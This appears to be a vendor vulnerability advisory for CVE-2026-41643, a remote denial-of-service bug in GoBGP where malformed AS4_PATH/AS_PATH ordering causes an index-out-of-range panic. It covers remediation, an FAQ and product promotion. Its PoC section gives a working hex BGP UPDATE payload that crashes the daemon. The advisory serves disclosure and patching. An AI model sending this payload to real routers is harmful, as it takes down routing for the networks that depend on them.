CVE-2026-41643

CVE-2026-41643 is a high-severity security vulnerability in github.com/osrg/gobgp/v4 (go), affecting versions <= 4.2.0. It is fixed in 4.3.0.

Summary

A remote Denial of Service (DoS) vulnerability exists in GoBGP where a malformed BGP UPDATE message can trigger a runtime error: index out of range panic. This occurs during the processing of 4-byte AS attributes when the message structure causes an internal slice index shift that is not properly handled.

Details

The vulnerability is located in internal/pkg/table/message.go within the UpdatePathAttrs4ByteAs function.

When GoBGP processes a BGP UPDATE message containing both an AS_PATH and an AS4_PATH attribute, it attempts to merge or validate them to support 4-byte AS numbers. If the attributes are ordered such that AS4_PATH (Type 17) appears before AS_PATH (Type 2), and the AS4_PATH is deemed invalid/malformed, the code attempts to remove the AS4_PATH attribute from the msg.PathAttributes slice.
It appears the crash happens due to an index shift in msg.PathAttributes:

#GoBGP v4.2.0
// Line 112: If AS4_PATH precedes AS_PATH, the deletion causes all subsequent attributes to shift left.
msg.PathAttributes = append(msg.PathAttributes[:as4AttrPos], msg.PathAttributes[as4AttrPos+1:]...)

// Line 206: The stale asAttrPos index is used here.
//The function continues to use the stale index (asAttrPos) to update the AS_PATH. Since the slice length has decreased, accessing the old index leads to a panic.
msg.PathAttributes[asAttrPos] = bgp.NewPathAttributeAsPath(newIntfParams)

This deletion causes all subsequent attributes in the slice to shift left by one position. However, the function continues to use the original asAttrPos index (calculated before the deletion) to access or modify the AS_PATH attribute later at Line 206. Because the slice is now shorter, the "stale" index points out of bounds, triggering a panic and crashing the entire GoBGP process.

PoC

Environment: * GoBGP version: 4.2.0
Configuration: Passive peering enabled.
Reproduction Steps:
Configure GoBGP with a neighbor (e.g., 192.168.31.195).
Send a specially crafted BGP UPDATE hex payload:

ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
00 22 02
00 00                  # Withdrawn Routes Length
00 0b                  # Total Path Attribute Length
40 11 01 02            # AS4_PATH (Type 17, Len 1, Val 02) - Triggers the bug
40 02 04 ff ff de ad   # AS_PATH (Type 2, Len 4)

The GoBGP process will immediately crash with: panic: runtime error: index out of range [1] with length 1.

Impact

Vulnerability Type: Remote Denial of Service (DoS).
Impacted Users: Any GoBGP deployment (v4.2.0 and earlier) that accepts BGP UPDATE messages from peers. Since this crash occurs in the FSM (Finite State Machine) handling loop, a single malicious peer or a malformed route propagated through a transit provider can consistently crash the BGP daemon, leading to a complete loss of routing capabilities.

CVE-2026-41643 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.3.0); upgrading removes the vulnerable code path.

Affected versions

github.com/osrg/gobgp/v4 (<= 4.2.0)

Security releases

github.com/osrg/gobgp/v4 → 4.3.0 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/osrg/gobgp/v4 to 4.3.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-41643? CVE-2026-41643 is a high-severity security vulnerability in github.com/osrg/gobgp/v4 (go), affecting versions <= 4.2.0. It is fixed in 4.3.0.
  2. How severe is CVE-2026-41643? CVE-2026-41643 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/osrg/gobgp/v4 are affected by CVE-2026-41643? github.com/osrg/gobgp/v4 (go) versions <= 4.2.0 is affected.
  4. Is there a fix for CVE-2026-41643? Yes. CVE-2026-41643 is fixed in 4.3.0. Upgrade to this version or later.
  5. Is CVE-2026-41643 exploitable, and should I be worried? Whether CVE-2026-41643 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-41643 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41643? Upgrade github.com/osrg/gobgp/v4 to 4.3.0 or later.

Other vulnerabilities in github.com/osrg/gobgp/v4

CVE-2026-42285CVE-2026-37461CVE-2026-7734CVE-2026-41643CVE-2026-41642

Stop the waste.
Protect your environment with Kodem.